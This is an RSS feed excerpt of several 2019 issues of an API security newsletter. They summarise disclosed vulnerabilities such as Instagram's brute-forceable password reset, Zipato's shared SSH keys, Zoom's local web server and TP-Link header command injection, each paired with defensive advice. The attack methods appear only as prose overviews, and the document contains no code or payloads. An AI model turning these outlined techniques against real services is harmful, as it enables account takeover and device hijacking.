					<description><![CDATA[<p>This week, we have a lot of high-profile API vulnerabilities, like Instagram, Zipato, and 7-Eleven. Also, 42Crunch has released a native API firewall for microservices in Kubernetes. Vulnerability: Instagram Laxman Muthiyah got his $30K bug bounty for reporting this vulnerability to Instagram: He managed to use the Instagram API to take over an arbitrary account. The [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-40-instagram-7-eleven-zipato/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-40-instagram-7-eleven-zipato/">Issue 40: Vulnerabilities in Instagram, 7-Eleven, Zipato</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a lot of high-profile API vulnerabilities, like Instagram, Zipato, and 7-Eleven. Also, 42Crunch has released a native API firewall for microservices in Kubernetes.</p>
<h2>Vulnerability: Instagram</h2>
<p>Laxman Muthiyah got his $30K bug bounty for reporting this vulnerability to Instagram: <a href="https://thezerohack.com/hack-any-instagram" target="_blank" rel="noopener">He managed to use the Instagram API to take over an arbitrary account</a>.</p>
<p>The vulnerability was in the API that Instagram exposes for password resets in its mobile app. You can make a <code>POST</code> call to request a 6-digit password reset code sent to the mobile number associated with the account. You then have 10 minutes to use the code to reset the account password before the code expires. Without the phone, attackers must &#8220;guess&#8221; the code. For this, there is another <code>POST</code> call that could be used to try the million possible code variations.</p>
<p>To prevent this kind of brute-forcing, Instagram had implemented rate-limiting so that only about 200 attempts can be made from a single IP address. However, Muthiyah overcame this limitation by renting out AWS EC2 instances for 10 minutes and running the calls from them. The rented instances all had different IP addresses, so Instagram&#8217;s rate limiting did not get triggered.</p>
<p>To prevent similar exploits, API providers should not limit throttling to just IP addresses. For example, too many frequent password reset attempts sent for a single account obviously is an attack and needs to be blocked as such.</p>
<h2>Vulnerability: Zipato</h2>
<p>Zipato smart hub is used in thousands of homes. <a href="https://blackmarble.sh/zipato-smart-hub/" target="_blank" rel="noopener">Researchers found a combination of vulnerabilities</a> that let them remotely lock and unlock doors managed by Zipato controllers.</p>
<p>The first vulnerability was in the shared SSH private keys used on the devices. The researchers located and extracted the keys from one of the controllers and  verified that the same keys were used in all of Zipato devices. Using the SSH key, the researchers could then remotely connect to the smart hubs and get records of the users and the locks connected to the system.</p>
<p>At this point, the researchers found that the APIs for the locks had vulnerable authentication mechanism. In what is referred to as &#8220;pass-the-hash&#8221; vulnerability, the locks accepted password hash instead of the actual password to authenticate! With the hashes obtained from the smart hubs, researchers could now authenticate and make API calls to open or close the individual locks.</p>
<p>Advice to API providers: never ever use hard-coded, default, shared passwords or keys, and always adhere to authentication best practices.</p>
<h2>Vulnerability: 7-Eleven Japan</h2>
<p>Another API hack through the password reset API. <a href="https://news.yahoo.co.jp/byline/mikamiyoh/20190704-00132766/" target="_blank" rel="noopener">This one the attackers successfully used in the wild, stealing about $510K from 900 customers</a>.</p>
<p>7-Eleven Japan released a mobile payment app, 7pay, for their customers. The app had a vulnerable API for password reset. The API required providing some user profile information — such as the date of birth, phone number, and email address — before it would send the password reset link to the email address that the user supplied. Interestingly, the app allowed specifying a different email for this than the one that was used when registering the account.</p>
<p>The attackers used various databases containing the personal information of Japanese population and a script that called the API for each record to test the required user information. When the attackers requested password reset, they simply specified the reset link to be sent in their own email address.</p>
<p>According to 7-Eleven Japan, the attackers managed to take over about 900 user accounts and spend their money before the vulnerability was discovered. The timeline is very impressive, and everything happened very quickly.  The vendor had to pull the application from the market after a mere 3 days of introducing it!</p>
<p>In this particular case, beyond the lack of proper rate limiting and monitoring, the issue was obviously in the design of the API design: allowing password reset code to be sent to an arbitrary email address is a clear design flaw.</p>
<h2>Tools: 42Crunch API protection for microservices</h2>
<p>The API security vendor, 42Crunch, has updated their API security platform to provide a <a href="https://42crunch.com/automated-api-security-kubernetes/" target="_blank" rel="noopener">native API firewall for microservices in Kubernetes</a>.</p>
<p>Service meshes like Istio offer some network-level protection features for microservices. For example, you can specify that microservice A is only allowed to talk to microservice B.</p>
<p>42Crunch API Firewall complements this on the application (API) level. The firewall checks each and every API call and response to make sure that only transactions conforming to the API contract get through to the API. This functionality complements static and dynamic API checks that 42Crunch Platform offers to locate possible vulnerabilities.</p>
<p>See the demo video and details in the <a href="https://42crunch.com/automated-api-security-kubernetes/" target="_blank" rel="noopener">company&#8217;s announcement</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-40-instagram-7-eleven-zipato/">Issue 40: Vulnerabilities in Instagram, 7-Eleven, Zipato</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 39: Vulnerable local Zoom webservers on 4+ mln Macs</title>
		<link>https://apisecurity.io/issue-39-vulnerable-local-zoom-webservers-4-mln-macs/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Jul 2019 22:00:08 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6096</guid>

					<description><![CDATA[<p>This week, we take a look at Zoom&#8217;s insecure API snafu that affects millions of Mac users, improvements to the OpenAPI support in Visual Studio Code (VS Code), the PolarProxy tool for TLS traffic decoding, the latest API breach fines, and a new survey on cloud security. Vulnerabilities: Zoom Zoom is a popular video conferencing [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-39-vulnerable-local-zoom-webservers-4-mln-macs/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-39-vulnerable-local-zoom-webservers-4-mln-macs/">Issue 39: Vulnerable local Zoom webservers on 4+ mln Macs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at Zoom&#8217;s insecure API snafu that affects millions of Mac users, improvements to the OpenAPI support in Visual Studio Code (VS Code), the PolarProxy tool for TLS traffic decoding, the latest API breach fines, and a new survey on cloud security.</p>
<h2>Vulnerabilities: Zoom</h2>
<p>Zoom is a popular video conferencing app. Unfortunately, in their pursuit of ease of use, they deployed local web servers with vulnerable APIs to the computers of more than 4 million of Mac users!</p>
<p>Zoom wanted to have a one-click-join experience for their conference call links. The native Safari browser on Macs does not support application-specific links such as <code>zoom://</code>. As a work-around to this limitation, Zoom is quietly deploying their own web server locally on Macs. This allows them to start the meetings by making localhost calls from their pages.</p>
<p>Modern browsers have Cross-Origin Resource Sharing (CORS) protection that normally prevents such use. However, Zoom circumvented the protection by <em>masking</em> the API calls as image load calls!</p>
<p>As the result, attackers can embed an <code>img</code> element onto a web page and force your Mac to start a Zoom session with your camera on. Another way they could to do that is to include an <code>iframe</code> element with the Zoom link. Either way, no action other than landing onto this crafted web page is required from the user.</p>
<p>The API is not fully documented so there may also be other methods for further remote attacks. For example, the local web server also re-installs Zoom even if you uninstall the app unless you also separately kill the local web server.</p>
<p>See the <a href="https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5" target="_blank" rel="noopener">full report by Jonathan Leitschuh</a>, it is a fascinating read.</p>
<h2>Tools: The OpenAPI extension for Visual Studio Code</h2>
<p>VS Code is a popular Integrated Developer Environment (IDE). The <a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener">OpenAPI extension</a> for it was released about a month ago, originally only supporting API contracts in JSON format.</p>
<p>This week, the extension has been updated to include support for YAML format as well. Now, all functionalities — new API templates, navigation, linting, snippets, Go To Definition, IntelliSense — are available for both formats.</p>
<p><a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6098" src="https://apisecurity.io/wp-content/uploads/2019/07/OpenAPI-YAML-in-VS-Code.gif" alt="" width="600" height="400" /></a></p>
<h2>Tools: PolarProxy</h2>
<p>Netresec has released their free <a href="https://www.netresec.com/?page=PolarProxy" target="_blank" rel="noopener">PolarProxy</a> tool for malware researchers and incident responders.</p>
<p>It is a transparent SSL/TLS proxy that decrypts traffic and saves it as a Wireshark PCAP file for further research.</p>
<p><img loading="lazy" decoding="async" class="aligncenter size-medium" src="https://www.netresec.com/images/PolarProxy-FlowChart_680x239.png" width="680" height="239" /></p>
<h2>Fines for API Vulnerabilities</h2>
<p>We have covered the API vulnerability in the Jack&#8217;d dating app in <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/" target="_blank" rel="noopener">our earlier newsletter</a>. This week, the vendor Online Buddies <a href="https://ag.ny.gov/press-release/attorney-general-james-announces-settlement-dating-app-failure-secure-private-and-nude" target="_blank" rel="noopener">got fined $240K</a> for having that vulnerability in their API and failing to protect their users data.</p>
<h2>Surveys</h2>
<p>Cybersecurity Insiders has published their <a href="https://www.helpnetsecurity.com/2019/07/01/cloud-data-security-concerns/" target="_blank" rel="noopener">2019 Cloud Security Report</a>. Some relevant highlights from the report include:</p>
<ul>
<li>Data loss and leakage are the top cloud security concerns(64%).</li>
<li>The biggest vulnerabilities in the minds of security professionals are (each with 42%):
<ul>
<li>Unauthorized access through misuse of employee credentials and improper access controls</li>
<li>Insecure APIs</li>
</ul>
</li>
</ul>
<h2>API Security Briefings from Amazon Echo</h2>
<p>You can now add this newsletter to your news briefings on Amazon Echo and Alexa devices:</p>
<ol>
<li>Open your Amazon Alexa app.</li>
<li>Go to <strong>Skills &amp; Games</strong>.</li>
<li>Search for <strong>API Security</strong>.</li>
<li>Enable the skill.</li>
</ol>
<p>Now, whenever you ask Alexa to read you the news, you will also hear the latest from our newsletter.</p>
<p>The post <a href="https://apisecurity.io/issue-39-vulnerable-local-zoom-webservers-4-mln-macs/">Issue 39: Vulnerable local Zoom webservers on 4+ mln Macs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 38: Cracked smartlocks, X-Frame-Options, standards gaining adoption</title>
		<link>https://apisecurity.io/issue-38-cracked-smartlocks-x-frame-options-standards-gaining-adoption/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Jul 2019 22:00:07 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6063</guid>

					<description><![CDATA[<p>This week, we have seen some major adoption milestones for the OpenAPI and the DNS over HTTPS standards, we discuss the way to go about with TLS pinning and the X-Frame-Options header, some not-so-smart locks, and the updated API security tooling from 42Crunch. Vulnerabilities: Ultraloq smartlocks Ultraloq smartlocks come with a mobile app, and its APIs [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-38-cracked-smartlocks-x-frame-options-standards-gaining-adoption/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-38-cracked-smartlocks-x-frame-options-standards-gaining-adoption/">Issue 38: Cracked smartlocks, X-Frame-Options, standards gaining adoption</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have seen some major adoption milestones for the OpenAPI and the DNS over HTTPS standards, we discuss the way to go about with TLS pinning and the <code>X-Frame-Options</code> header, some not-so-smart locks, and the updated API security tooling from 42Crunch.</p>
<h2>Vulnerabilities: Ultraloq smartlocks</h2>
<p>Ultraloq smartlocks come with a mobile app, and <a href="https://www.pentestpartners.com/security-blog/the-not-so-ultra-lock/" target="_blank" rel="noopener">its APIs have now proven to be vulnerable</a>. The APIs had no authentication or authorization in place, and they used <code>base64</code> encoding instead of encryption. In addition to that, the user IDs were susceptible to enumeration.</p>
<p>Attackers could enumerate all users and their locks, get the physical PIN codes of each lock and change them, and get the BLE keys for the lock&#8217;s Bluetooth commands. Armed with that information, the attackers could take control of the lock. They could control the locks and lock the owners out, both with the physical number codes and Bluetooth commands.</p>
<h2>Standards: OpenAPI Specification v3</h2>
<p><a href="https://www.openapis.org/" target="_blank" rel="noopener">OpenAPI Specification (OAS)</a> is the industry standard for machine-readable REST API contracts. The standard is backed by 35 companies under a Linux Foundation project.</p>
<p>The UK Open Standards board now <a href="https://www.gov.uk/government/publications/recommended-open-standards-for-government/describing-restful-apis-with-openapi-3" target="_blank" rel="noopener">officially recommends that government organisations use OAS version 3 to describe RESTful APIs</a>.</p>
<h2>Standards: DNS over HTTPS</h2>
<p>Google <a href="https://security.googleblog.com/2019/06/google-public-dns-over-https-doh.html" target="_blank" rel="noopener">graduates their public DNS over HTTPS (DoH) service</a> with full support for <a href="https://tools.ietf.org/html/rfc8484" target="_blank" rel="noopener">RFC 8484</a>.</p>
<p>Using DoH is highly recommended and helps developers fight man-in-the-middle attacks.</p>
<h2>Best practices: TLS certificate pinning</h2>
<p>TLS certificate pinning can help further improve your API protection against man-in-the-middle attacks. If you need a quick introduction on that technology, see the <a href="https://www.alienvault.com/blogs/security-essentials/a-guide-to-mobile-tls-pinning" target="_blank" rel="noopener">recent article by Sam Bocetta at AT&amp;T Cybersecurity</a>.</p>
<h2>Best practices: X-FRAME-OPTIONS headers</h2>
<p>You can (and should!) use the <code>X-Frame-Options</code> HTTP response header to block the browser from using the output of your API in the <code>frame</code> , <code>iframe</code> , <code>embed</code> or <code>object</code> element on a page.</p>
<p>If you have any doubts about that, read this <a href="https://medium.com/intigriti/gotcha-taking-phishing-to-a-whole-new-level-72eda9e30bef" target="_blank" rel="noopener">brilliant write-up by Inti De Ceukelaire</a>. He used an API from a password management solution that did not have this header set to launch very effective phishing attacks.</p>
<h2>Tools: 42Crunch API security</h2>
<p>42Crunch Platform enables security by design from API development, to testing, to protection in production use.</p>
<p>Last week, the company <a href="https://42crunch.com/platform-enhancements-june-2019/" target="_blank" rel="noopener">released an updated version of their SaaS platform</a>. The improvements include enhancements in static security audit and dynamic scan reports, user and token management,  and support for DevSecOps support.</p>
<p><a href="https://42crunch.com/platform-enhancements-june-2019/"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6071" src="https://apisecurity.io/wp-content/uploads/2019/07/1-Overview.png" alt="" width="2736" height="1824" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-38-cracked-smartlocks-x-frame-options-standards-gaining-adoption/">Issue 38: Cracked smartlocks, X-Frame-Options, standards gaining adoption</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 37: Vulnerabilities with WebLogic and OnePlus, the Black Hat API workshop, and OAuth in action</title>
		<link>https://apisecurity.io/issue-37-weblogic-oneplus-black-hat-api-workshop-oauth-action/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 Jun 2019 22:00:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6041</guid>

					<description><![CDATA[<p>This week, we look into the latest API vulnerabilities in Oracle WebLogic and OnePlus, API security workshop at Black Hat, API security tech landscape, and a new tool for OAuth and OpenID Connect debugging. Vulnerabilities: Oracle WebLogic Oracle WebLogic has issued a critical API security patch. Just like with an earlier similar issue, the flaw [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-37-weblogic-oneplus-black-hat-api-workshop-oauth-action/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-37-weblogic-oneplus-black-hat-api-workshop-oauth-action/">Issue 37: Vulnerabilities with WebLogic and OnePlus, the Black Hat API workshop, and OAuth in action</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into the latest API vulnerabilities in Oracle WebLogic and OnePlus, API security workshop at Black Hat, API security tech landscape, and a new tool for OAuth and OpenID Connect debugging.</p>
<h2>Vulnerabilities: Oracle WebLogic</h2>
<p>Oracle WebLogic <a href="https://www.securityweek.com/oracle-patches-another-remote-code-execution-flaw-weblogic" target="_blank" rel="noopener">has issued a critical API security patch</a>. Just like <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener">with an earlier similar issue</a>, the flaw lies in XML workload deserialization.</p>
<p>To protect themselves against malformed payload attacks, API providers should start with defining and enforcing schemas on all payloads.</p>
<h2>Vulnerabilities: OnePlus</h2>
<p>The wallpaper crowdsourcing functionality of OnePlus phones had an API that <a href="https://9to5google.com/2019/06/14/oneplus-wallpapers-app-leak/" target="_blank" rel="noopener">was leaking personal data of every customer</a> who had uploaded their pictures: name, email, country. In addition, the key required to invoke this API was easily discoverable.</p>
<p>Advice to API providers:</p>
<ul>
<li>Make sure that APIs <em>never</em> expose more than the minimal set of data that the API consumer needs. In this particular case, the actual wallpaper app didn&#8217;t need the personal information at all — it was just bundled into the whole set of everything that the API grabbed from the backend database!</li>
<li>Use best practices for authentication that make it harder for attackers to invoke your APIs outside your apps.</li>
<li>Ensure that automated enumeration of records to enable bulk downloads is not possible.</li>
<li>Have monitoring and reporting to detect any bulk activity.</li>
</ul>
<h2>Conferences: Black Hat</h2>
<p>If you are attending Black Hat USA on August 3—8 in Las Vegas, or Black Hat Europe December 2—5 in London this year, consider taking the two-day workshop &#8220;Attacking and Securing APIs&#8221; by Mohammed Aldoub. This is a hands-on, practical preconference workshop that boosts your knowledge on possible API attack vectors and how to be prepared for them. See details for <a href="https://www.blackhat.com/us-19/training/schedule/#attacking-and-securing-apis-14399" target="_blank" rel="noopener">US</a> and <a href="https://www.blackhat.com/eu-19/training/schedule/index.html#attacking-and-securing-apis-15133" target="_blank" rel="noopener">Europe</a>.</p>
<h2>WAF vs API management vs API security</h2>
<p>Alissa Knight from the Aite Group published <a href="https://www.linkedin.com/pulse/stranger-tides-api-container-security-part-2-alissa-valentina-knight" target="_blank" rel="noopener">part two of her API and Container Security series</a>. This time she talks about the differences between web application firewalls (WAF), API management, and API security products.</p>
<h2>Tools: OAuth and OpenID Connect</h2>
<p>Curity has launched their <a href="https://oauth.tools/" target="_blank" rel="noopener">OAuth Tools</a> site that lets you play with various OAuth and OpenID Connect flows.</p>
<p>Connect to any OAuth server and run the flows of your choice, see all interactions, and inspect tokens. They have also posted a tutorial video that you can watch <a href="https://youtu.be/LvhUTHiofe0" target="_blank" rel="noopener">here</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-37-weblogic-oneplus-black-hat-api-workshop-oauth-action/">Issue 37: Vulnerabilities with WebLogic and OnePlus, the Black Hat API workshop, and OAuth in action</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 36: Vulnerabilities at TP-Link, Venmo, Amcrest, and GateHub</title>
		<link>https://apisecurity.io/issue-36-tp-link-amcrest-venmo-gatehub/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 19 Jun 2019 22:00:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6030</guid>

					<description><![CDATA[<p>This week, we discuss API vulnerabilities in TP-Link Wi-Fi extenders, Amcrest cameras, Venmo transaction feed, and GateHub cryptocurrency wallet. We also take a look at the API security aspects of microservices architectures. Vulnerabilities: TP-Link Wi-Fi extenders TP-Link Wi-Fi extenders are a popular way to get a better Wi-Fi coverage in houses and other spaces. Unfortunately, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-36-tp-link-amcrest-venmo-gatehub/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-36-tp-link-amcrest-venmo-gatehub/">Issue 36: Vulnerabilities at TP-Link, Venmo, Amcrest, and GateHub</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we discuss API vulnerabilities in TP-Link Wi-Fi extenders, Amcrest cameras, Venmo transaction feed, and GateHub cryptocurrency wallet. We also take a look at the API security aspects of microservices architectures.</p>
<h2>Vulnerabilities: TP-Link Wi-Fi extenders</h2>
<p>TP-Link Wi-Fi extenders are a popular way to get a better Wi-Fi coverage in houses and other spaces. Unfortunately, this week <a href="https://securityintelligence.com/posts/critical-rce-vulnerability-in-tp-link-wi-fi-extenders-can-grant-attackers-remote-control/" target="_blank" rel="noopener noreferrer">some of them got hacked through remote API calls</a> that allowed complete device take-over.</p>
<p>The attack was accomplished by sending HTTP requests with specifically crafted <code>User-Agent</code> header. Just like with classical SQL injections, attackers included special characters that made the devices execute the code after these characters as local system commands. The API endpoint processes on the devices were executed with root (administrative) privilege, opening limitless opportunities for attackers.</p>
<p><img decoding="async" class="aligncenter size-medium" src="https://securityintelligence.com/wp-content/uploads/2019/06/fig1.png" /></p>
<p>Advice to vendors:</p>
<ul>
<li>Define and enforce limits and patterns on <em>all</em> incoming and outgoing data (headers, parameters, or payloads) to make sure that your API never receives any unexpected data.</li>
<li>Use accounts with minimal permission levels.</li>
</ul>
<h2>Vulnerabilities: Venmo</h2>
<p>The popular consumer payment app <a href="https://techcrunch.com/2019/06/16/millions-venmo-transactions-scraped/" target="_blank" rel="noopener noreferrer">keeps having their transaction data leaking</a>. This week, a researcher published 7 million financial transactions made by Venmo users.</p>
<p>The problem lies in the API that Venmo exposes so its app can show a feed of transactions that users&#8217; friends are making. While this social aspect is a part of the experience that Venmo has created on purpose, there was no design reason for anyone to be able to invoke the API directly, outside of the Venmo app.</p>
<p>When notified of the issue about a year ago (when 207 mln transactions leaked), Venmo tried to mitigate the issue by simply limiting the maximum API invocation rate to 40 calls per minute. Now Dan Salmon simply created a script that operated within that limit and downloaded the 7 mln transactions over a span of few months.</p>
<p>Recommendation to vendors:</p>
<ul>
<li>Ensure that your APIs can <em>only</em> be invoked by clients that <em>need</em> to invoke them (for example, your mobile app).</li>
<li>Always protect APIs with proper authentication and authorization.</li>
<li>Ensure that automated enumeration of records for bulk downloads is not possible.</li>
<li>Set up monitoring and reporting to detect bulk activity.</li>
</ul>
<h2>Vulnerabilities: Amcrest HDSeries cameras</h2>
<p>Amcrest HDSeries cameras are popular, inexpensive consumer Wi-Fi security cameras. This week, <a href="https://threatpost.com/amcrest-critical-security-issues/145507/" target="_blank" rel="noopener noreferrer">a vulnerability has been disclosed</a> that allows attackers to take complete control of the camera.</p>
<p>One of the flaws was that each camera stored the administrative credentials in cleartext in a specific location on the camera. Anyone who knew the location could download the credentials simply using the corresponding URL.</p>
<p>The most severe issue (10/10 in the Common Vulnerability Scoring System (CVSS) rating) was an API vulnerability allowing the complete remote camera take-over:</p>
<ul>
<li>All camera management functionality is available through the API powering the mobile and web-app interfaces.</li>
<li>The API requires authentication with username and password. The credentials are expected to be sent base64-encoded in one of the HTTP headers in the API calls.</li>
<li>Unfortunately, the header length was not limited in the API implementation. Attackers could simply send a string of 1,024 characters to cause an overflow in the authentication check, and gain control over the camera without the credentials. The following article in API Security Encyclopedia covers this scenario: <a href="https://apisecurity.io/ref/security/datavalidation/parameters/parameter-string-maxlength/">String parameter has no maximum length defined</a>.</li>
</ul>
<p>To make matters worse, all cameras could be located with the Shodan search engine, aggravating the problems.</p>
<p>To avoid such vulnerabilities in your APIs, make sure that:</p>
<ul>
<li>No devices can access data or files outside <em>protected</em> APIs.</li>
<li>Avoid making devices searchable on search engines on the internet.</li>
<li>Use security best practices for authentication.</li>
<li>Define and enforce limits on all incoming and outgoing data: headers, parameters, payloads.</li>
</ul>
<p>The issue was reported by <a href="https://www.linkedin.com/in/mandarsatam/" target="_blank" rel="noopener noreferrer">Mandar Satam</a> from Synopsis.</p>
<h2>Vulnerabilities: GateHub</h2>
<p>GateHub cryptocurrency wallets <a href="https://gatehub.net/blog/gatehub-preliminary-statement/" target="_blank" rel="noopener noreferrer">got hacked through APIs</a>, and the attackers stole approximately $9.5 mln worth of cryptocurrency! This is one of those cases where the consequences of the API breach are <em>very</em> tangible and immediately apparent. Unfortunately, GateHub did not provide details on the vulnerability beyond stating that APIs had been protected with authentication.</p>
<p>Too many companies still assume that API security is simply authentication. They rely on some sort of API management or API gateway solution to provide authentication, and are lulled into a false sense of security that can lead to a failure similar to the one that GateHub experienced. There is a lot more to API security than just authentication, like input and output validation, integrity, confidentiality, availability, authorization, audit, non-repudiation — and none of the aspects can be ignored.</p>
<p>UPDATE: One of the readers sent us a link to a forum with the following details from alleged hacker behind the breach:</p>
<blockquote><p><em>Gatehub has its user database from 2017 stolen from an AWS S3 backup and I used the tokens to dump the API keys &amp; decrypt them with AES. I needed the secret key which is the bcrypted password. Someone stated it earlier &amp; he was right.</em></p></blockquote>
<p>If the information is correct (unfortunately, there are still no details from GateHub), looks like this vulnerability was a combination of:</p>
<ul>
<li>Lack of security when storing backups with sensitive data</li>
<li>Lack of proper API use monitoring and alerting</li>
<li>Poorly designed authentication system which allows anyone to take tokens from 2 years ago and still use them</li>
</ul>
<h2>Analysts: API security and microservices</h2>
<p>KuppingerCole analyst, Alexei Balaganski, has published a post &#8220;<a href="https://www.kuppingercole.com/blog/balaganski/api-security-in-microservices-architectures" target="_blank" rel="noopener noreferrer">API Security in Microservices Architectures</a>&#8220;. The main points include:</p>
<ul>
<li>The new tools and technology that microservices architectures rely on bring new security challenges and require new skills.</li>
<li>APIs are the most critical attack vector in microservices architectures.</li>
<li>Many businesses keep underestimating API security and hoping that legacy technology like web application firewalls (WAF) or API gateways can help.</li>
<li>Key challenges for API security in microservices architecture:
<ul>
<li>Scale: the exponential growth in communications through APIs between hundreds of microservices</li>
<li>Ephemeral endpoints: they get dynamically spun up and shut down</li>
<li>Diverse technology: programming languages, frameworks, authentication, authorization</li>
<li>Networking: isolation, segmentation, traffic encryption.</li>
</ul>
</li>
<li>Recommended solutions:
<ul>
<li>Design a strategy that covers the whole API lifecycle.</li>
<li>Perform proactive security assessment of each microservice.</li>
<li>Protect each microservice with individual micro API firewall.</li>
<li>Consider Secure Production Identity Framework for Everyone (SPIFFE) and service meshes.</li>
</ul>
</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-36-tp-link-amcrest-venmo-gatehub/">Issue 36: Vulnerabilities at TP-Link, Venmo, Amcrest, and GateHub</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 35: IDE support for OpenAPI</title>
		<link>https://apisecurity.io/issue-35-ide-support-openapi/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 12 Jun 2019 22:00:57 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6018</guid>

					<description><![CDATA[<p>This week, we take a look at API vulnerabilities at NVIDIA and Supra, an OpenAPI extension for Visual Studio Code, and an upcoming API security webinar from NordicAPIs. Vulnerabilities: NVIDIA GeForce Experience NVIDIA GeForce Experience (GFE) is a supplementary application that users install with other NVIDIA products to &#8220;capture and share videos, screenshots, and livestreams [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-35-ide-support-openapi/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-35-ide-support-openapi/">Issue 35: IDE support for OpenAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at API vulnerabilities at NVIDIA and Supra, an OpenAPI extension for Visual Studio Code, and an upcoming API security webinar from NordicAPIs.</p>
<h2>Vulnerabilities: NVIDIA GeForce Experience</h2>
<p>NVIDIA GeForce Experience (GFE) is a supplementary application that users install with other NVIDIA products to &#8220;<em>capture and share videos, screenshots, and livestreams with friends, and keep your drivers up to date and optimize your game settings.</em>&#8221;</p>
<p>This week, GFE suffered an <a href="https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/" target="_blank" rel="noopener">API vulnerability that allowed arbitrary remote command execution</a>.</p>
<p>GFE starts a local API server that allows Cross-Origin Resource Sharing (CORS) from any origin. This makes it possible to send requests from a website that the attacker controls. It also had a <code>POST</code> operation that fed the payload directly into the OS execution.</p>
<p>Be mindful to only allow calls from the origin they are supposed to come, and always lock down and sanitize your inputs.</p>
<h2>Vulnerabilities: Supra TV</h2>
<p><strong>Supra Smart Cloud TV</strong> <strong>API</strong> vulnerability <a href="https://threatpost.com/smart-tv-bug-rogue-broadcasts/145275/" target="_blank" rel="noopener">allows attackers to hijack TV-sets and make them stream content from an arbitrary URL</a>. It is a classic case of security by obscurity. Each device has an undocumented, unprotected API that attackers may use to supply a URL of the content to be streamed. No authentication is required.</p>
<p>To take advantage of the vulnerability, the attacker must access the TV from the network, for example, through <a href="https://apisecurity.io/issue-26-verizon-routers-patched-api-vulnerability/" target="_blank" rel="noopener">a vulnerability in the home router</a>.</p>
<p>Remember: even if your API is meant for internal use only, and you do not promote its existence, you still need to secure it. Otherwise, it is only a matter of time before someone finds it and exploits it.</p>
<h2>Tools: Visual Studio OpenAPI Extension</h2>
<p>Visual Studio Code (VS Code) is a popular open-source integrated developer environment (IDE) from Microsoft.</p>
<p>There is now <a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener">a new VS Code extension</a> that makes it much easier to create new OpenAPI (formerly Swagger) files, and navigate and edit them. The extension adds API templates, navigation within the API definition, code snippets, schema validation, and IntelliSense for OpenAPI to the editor.</p>
<p><a href="https://marketplace.visualstudio.com/items?itemName=42Crunch.vscode-openapi" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6019" src="https://apisecurity.io/wp-content/uploads/2019/06/VSCode-OpenAPI-Quick-Walkthrough.gif" alt="" width="600" height="400" /></a></p>
